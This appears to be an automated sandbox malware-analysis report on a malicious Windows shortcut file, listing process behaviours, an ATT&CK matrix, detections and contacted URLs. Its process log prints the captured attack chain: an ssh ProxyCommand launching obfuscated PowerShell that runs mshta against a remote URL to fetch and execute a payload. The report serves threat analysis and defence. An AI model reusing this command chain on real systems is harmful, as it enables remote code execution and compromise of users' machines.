Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1334Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1927Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1858Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 4676Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2680Thread sleep count: 1334 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3200Thread sleep count: 1927 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2504Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1172Thread sleep count: 1858 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1172Thread sleep count: 64 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5640Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2684Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: mshta.exe, 00000005.00000002.3564144751.000001B5C0FD7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3564144751.000001B5C0F3D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3564687126.0000021AF9C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3566878515.0000021AFF25B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 00000005.00000002.3564144751.000001B5C0F77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWindowClassr6
Source: ssh.exe, 00000000.00000002.3563617247.00000229B4079000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\mshta.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://awakka-aws3.zoho-documents.com/hekko.mp4"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://awakka-aws3.zoho-documents.com/hekko.mp4Jump to behavior
Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh.exe "c:\windows\system32\openssh\ssh.exe" -o proxycommand="powershell powershell -command 'uqtsm[`6fha6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4uqtsm[`6fha6[bo=yy'.substring(18, 54)" .
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter		1
DLL Side-Loading		11
Process Injection		11
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Disable or Modify Tools		LSASS Memory11
Process Discovery		Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials23
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582822 Sample: IOnqEVA4Dz.lnk Startdate: 31/12/2024 Architecture: WINDOWS Score: 76 26 awakka-aws3.zoho-documents.com 2->26 32 Antivirus detection for URL or domain 2->32 34 Windows shortcut file (LNK) starts blacklisted processes 2->34 36 Multi AV Scanner detection for submitted file 2->36 38 3 other signatures 2->38 9 ssh.exe 2 2->9         started        12 svchost.exe 1 1 2->12         started        signatures3 process4 dnsIp5 42 Windows shortcut file (LNK) starts blacklisted processes 9->42 15 powershell.exe 7 9->15         started        18 conhost.exe 1 9->18         started        30 127.0.0.1 unknown unknown 12->30 signatures6 process7 signatures8 44 Windows shortcut file (LNK) starts blacklisted processes 15->44 20 powershell.exe 7 15->20         started        process9 signatures10 40 Windows shortcut file (LNK) starts blacklisted processes 20->40 23 mshta.exe 18 20->23         started        process11 dnsIp12 28 awakka-aws3.zoho-documents.com 172.67.129.82, 443, 49723, 49726 CLOUDFLARENETUS United States 23->28

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
IOnqEVA4Dz.lnk36%VirustotalBrowse
IOnqEVA4Dz.lnk34%ReversingLabsShortcut.Trojan.Pantera

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.cssD0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.css0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.css_0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637...00%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637a0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637=0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/hekko.mp4p0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?13767556370%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.css:0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/hekko.mp4Pgs0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/hekko.mp4C:0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637)0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/hekko.mp4yles/cf.errors.css0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/hekko.mp4_0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637...ust0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/hekko.mp4i0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/cdn-cgi/phish-bypass0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/hekko.mp4m320%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637...p0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.cssnt0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/hekko.mp4L0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/hekko.mp4https://awakka-aws3.zoho-documents.com/hekko.mp4p70%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637...0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/hekko.mp4100%Avira URL Cloudmalware
https://awakka-aws3.zoho-documents.com/hekko.mp4$global:?0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637q0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/hekko.mp4H0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/cdn-cgi/phish-bypassk0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/hekko.mp4Ygs0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637m0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637n0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/hekko.mp420%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637i0%Avira URL Cloudsafe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?13767556376.10%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
awakka-aws3.zoho-documents.com
172.67.129.82
truefalse
    		high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.cssfalse
    • Avira URL Cloud: safe
    		unknown
    https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637false
    • Avira URL Cloud: safe
    		unknown
    https://awakka-aws3.zoho-documents.com/hekko.mp4true
    • Avira URL Cloud: malware
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://www.cloudflare.com/5xx-eraryermshta.exe, 00000005.00000002.3564144751.000001B5C0FD7000.00000004.00000020.00020000.00000000.sdmpfalse
      		high
      https://www.cloudflare.com/learning/access-management/phishing-attack/mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpfalse
        		high
        https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637amshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.css_mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000006.00000003.2366242998.0000021AFF090000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drfalse
          		high
          https://www.cloudflare.com/learning/access-management/phishing-attack/vmshta.exe, 00000005.00000002.3568334539.000001BDC7F62000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637...0mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637Amshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637=mshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.cssDmshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://awakka-aws3.zoho-documents.com/hekko.mp4ppowershell.exe, 00000004.00000002.2345137749.0000029200001000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.css:mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://awakka-aws3.zoho-documents.com/hekko.mp4Pgsmshta.exe, 00000005.00000002.3564144751.000001B5C0F3D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://awakka-aws3.zoho-documents.com/hekko.mp4C:mshta.exe, 00000005.00000002.3564144751.000001B5C0F00000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.2345137749.0000029200031000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637)mshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://awakka-aws3.zoho-documents.com/mshta.exe, 00000005.00000002.3564144751.000001B5C0FB8000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://www.cloudflare.com/learning/access-management/phishing-attack/Dmshta.exe, 00000005.00000002.3568334539.000001BDC7F62000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://awakka-aws3.zoho-documents.com/hekko.mp4imshta.exe, 00000005.00000002.3564064373.000001B5C0EF0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://awakka-aws3.zoho-documents.com/hekko.mp4yles/cf.errors.cssmshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://crl.ver)svchost.exe, 00000006.00000002.3566515266.0000021AFF200000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://awakka-aws3.zoho-documents.com/hekko.mp4Ppowershell.exe, 00000004.00000002.2345137749.000002920014C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2345137749.00000292003A2000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      https://awakka-aws3.zoho-documents.com/hekko.mp4_powershell.exe, 00000004.00000002.2348868362.000002927E6D1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637...pmshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.cloudflare.com/5xx-error-landingmshta.exe, 00000005.00000002.3566486432.000001BDC3A6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637...ustmshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://g.live.com/odclientsettings/Prod/C:edb.log.6.drfalse
                          		high
                          https://awakka-aws3.zoho-documents.com/cdn-cgi/phish-bypassmshta.exe, 00000005.00000002.3564144751.000001B5C0FD7000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://awakka-aws3.zoho-documents.com/hekko.mp4m32powershell.exe, 00000004.00000002.2348447690.000002927C7B0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.cssntmshta.exe, 00000005.00000002.3564144751.000001B5C0F3D000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://awakka-aws3.zoho-documents.com/hekko.mp4Lpowershell.exe, 00000004.00000002.2347693599.000002927C5E4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://awakka-aws3.zoho-documents.com/hekko.mp4https://awakka-aws3.zoho-documents.com/hekko.mp4p7mshta.exe, 00000005.00000002.3567740148.000001BDC3C15000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637...mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://awakka-aws3.zoho-documents.com/hekko.mp4Hmshta.exe, 00000005.00000002.3563920706.000001B5C0EC0000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://awakka-aws3.zoho-documents.com/cdn-cgi/phish-bypasskmshta.exe, 00000005.00000002.3564144751.000001B5C0FD7000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://awakka-aws3.zoho-documents.com/hekko.mp4Ygsmshta.exe, 00000005.00000002.3564144751.000001B5C0F3D000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.cloudflare.com/learning/access-management/phishing-attack/MXmshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://awakka-aws3.zoho-documents.com/hekko.mp4$global:?powershell.exefalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637qmshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://aka.ms/pscore68powershell.exe, 00000004.00000002.2345137749.0000029200049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2345137749.000002920005C000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://awakka-aws3.zoho-documents.com/hekko.mp42mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637mmshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637nmshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
